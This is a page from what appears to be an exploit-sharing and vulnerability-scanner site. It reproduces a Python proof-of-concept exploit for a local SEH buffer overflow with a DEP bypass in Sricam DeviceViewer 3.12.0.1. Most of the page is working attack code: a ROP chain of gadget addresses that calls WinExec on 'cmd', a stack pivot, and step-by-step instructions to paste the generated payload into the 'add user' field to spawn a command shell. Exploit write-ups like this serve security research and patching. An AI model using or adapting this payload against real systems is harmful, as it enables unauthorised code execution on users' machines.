deviceviewer 3.12.0.1 add user local buffer overflow (dep bypass)

▸▸▸ Exploit & Vulnerability >> local exploit & windows vulnerability

Online Vulnerability Scanner Tools

Code...

				
# Exploit Title: Sricam DeviceViewer 3.12.0.1 - 'add user' Local Buffer Overflow (DEP Bypass)
# Date: 08/10/2019
# Exploit Author: Alessandro Magnosi
# Vendor Homepage: http://www.sricam.com/
# Software Link: http://download.sricam.com/Manual/DeviceViewer.exe
# Version: v3.12.0.1
# Exploit type: Local
# Tested on: Windows 7 SP1

# Steps to reproduce:
#   1. Get the WinExec address from arwin.exe kernel32.dll WinExec
#   2. Change the related address in the PoC
#   3. Generate the payload using the PoC
#   4. Log in the Sricam DeviceViewer application
#   5. Go to System Configuration -> User Management
#   6. Put the content of the generated file in User Info -> Username  
#   7. Click on Add
#   8. A command shell will appear

#!/usr/bin/python

from struct import pack, unpack

def create_rop_chain():

    rops = [
    
    0x6a1142aa,  # XOR EDX,EDX # RETN
    
    0x6a569810,  # POP EDX # RETN [avcodec-54.dll] 
    0x6ae9c126,  # &Writable location [avutil-50.dll] 
    
    0x6a5dac8a,  # POP EAX # RETN
    0xff9b929d,  # NEG "cmd\0"

    0x6a2420e8,  # NEG EAX # RETN [avcodec-54.dll]
    
    0x6994766b,  # PUSH EAX # MOV DWORD PTR DS:[EDX],EAX # ADD ESP,3C # POP EBX # POP ESI # POP EDI # POP EBP # RETN [avformat-54.dll]
    0x6a2420ea,  # ROP NOP
    0x6a2420ea,  # ROP NOP
    0x6a2420ea,  # ROP NOP
    0x6a2420ea,  # ROP NOP
    0x6a2420ea,  # ROP NOP
    0x6a2420ea,  # ROP NOP
    0x6a2420ea,  # ROP NOP
    0x6a2420ea,  # ROP NOP
    0x6a2420ea,  # ROP NOP
    0x6a2420ea,  # ROP NOP
    0x6a2420ea,  # ROP NOP
    0x6a2420ea,  # ROP NOP
    0x6a2420ea,  # ROP NOP
    0x6a2420ea,  # ROP NOP
    0x6a2420ea,  # ROP NOP
    0x6a2420ea,  # ROP NOP
        
    0x6a18e062,  # ADD ESP, 10 # RETN ---> ESI
    0x6a2420ea,  # ROP NOP            ---> EDI     
        
    0x6a45e446,  # XCHG EAX,EDX # RETN  [avcodec-54.dll] 
    0x6a29d716,  # XCHG EAX,ECX # RETN  [avcodec-54.dll] 
    
    ##  ECX = ascii "cmd\0"
    
    0x6a569810,  # POP EDX # RETN [avcodec-54.dll] 
    0x6a36264a,  # CALL EBX
   
    ## EDX = CALL EBX
   
    0x6a5dac8a,  # POP EAX # RETN
    0x76e33231,  # ptr to WinExec() [kernel32.dll]  
    #### Unfortunately, this has to be hardcoded as no reliable pointer is available into the aplication  
    
    0x6a150411,  # XCHG EAX,EBX # RETN [avcodec-54.dll]
    
    ## EBX = &WinExec
    
    0x6a5dac8a,  # POP EAX # RETN
    0xffffffff,  # -0x00000001-> ebx
    0x6a2420e8,  # NEG EAX # RETN [avcodec-54.dll]
    
    ## EAX = 1
        
    0x6a5eb992,  # PUSHAD # RETN [avcodec-54.dll]
    0x6a2420ea,  # ROP NOP    
    0x6a2420ea,  # ROP NOP
    0x6a2420ea,  # ROP NOP
    0x6a2420ea,  # ROP NOP
    ]
    return ''.join(pack('<I', _) for _ in rops)


def nops(length):
    return "\x90" * length

rop_chain = create_rop_chain()
maxlen = 5000

# Stack pivoting address
# 0x6a443e58 : {pivot 2252 / 0x8cc} :  # ADD ESP,8BC # POP EBX # POP ESI # POP EDI # POP EBP # RETN [avcodec-54.dll]
seh = pack("<I", 0x6a443e58)

# Don't care nseh
nseh = nops(4)

payload = nops(8) + rop_chain + nops(360 - len(rop_chain) - 8) + nops(20) + nseh + seh + nops(300)
sec = maxlen - len(payload)
payload += nops(sec) # More junk to reach 5000

print("Exploit Length: " + str(len(payload)))

try:
    fname = "exprop.txt"
    exploit = open(fname,"w")
    print("Sricam DeviceViewer 3.12.0.1 Local Buffer Overflow Exploit")
    print("Author: Alessandro Magnosi\n")
    print("[*] Creating evil username")
    exploit.write(payload)
    exploit.close()
    print("[+] Username file created\n")
    print("[i] Now go to 'User Management' and try to add a user with user=<filecontent>")
    print("[+] A command shell will open")
except:
    print("[!] Error creating the file")

Deviceviewer 3.12.0.1 add user local buffer overflow (dep bypass) Vulnerability / Exploit Source : Deviceviewer 3.12.0.1 add user local buffer overflow (dep bypass)

Last Vulnerability or Exploits

▸ gitlab 14.9 - stored cross-site scripting (xss) ◂

Discovered: 2022-04-26
Exploit: webapps
Vulnerability: ruby

▸ gitlab 14.9 - authentication bypass ◂

Discovered: 2022-04-26
Exploit: webapps
Vulnerability: ruby

▸ easeus data recovery - 'ensserver.exe' unquoted service path ◂

Discovered: 2022-04-19
Exploit: local
Vulnerability: windows

▸ ptpublisher v2.3.4 - unquoted service path ◂

Discovered: 2022-04-19
Exploit: local
Vulnerability: windows

Developers

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Easy integrations and simple setup help you start scanning in just some minutes
Discover posible vulnerabilities before GO LIVE with your project
Manage your reports without any restriction

Business Owners

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Obtain a quick overview of your website's security information
Do an audit to find and close the high risk issues before having a real damage and increase the costs
Verify if your developers served you a vulnerable project or not before you are paying
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Run periodically scan for vulnerabilities and get info when new issues are present.

Penetration Testers

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Quickly checking and discover issues to your clients
Bypass your network restrictions and scan from our IP for relevant results
Create credible proved the real risk of vulnerabilities

Everybody

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check If you have an website and want you check the security of site you can use our products
Scan your website from any device with internet connection

Tusted by

Our Cyber Security Web Test application uses Cookies. By using our Cyber Security Web Test application, you are agree that we will use this information. I Accept.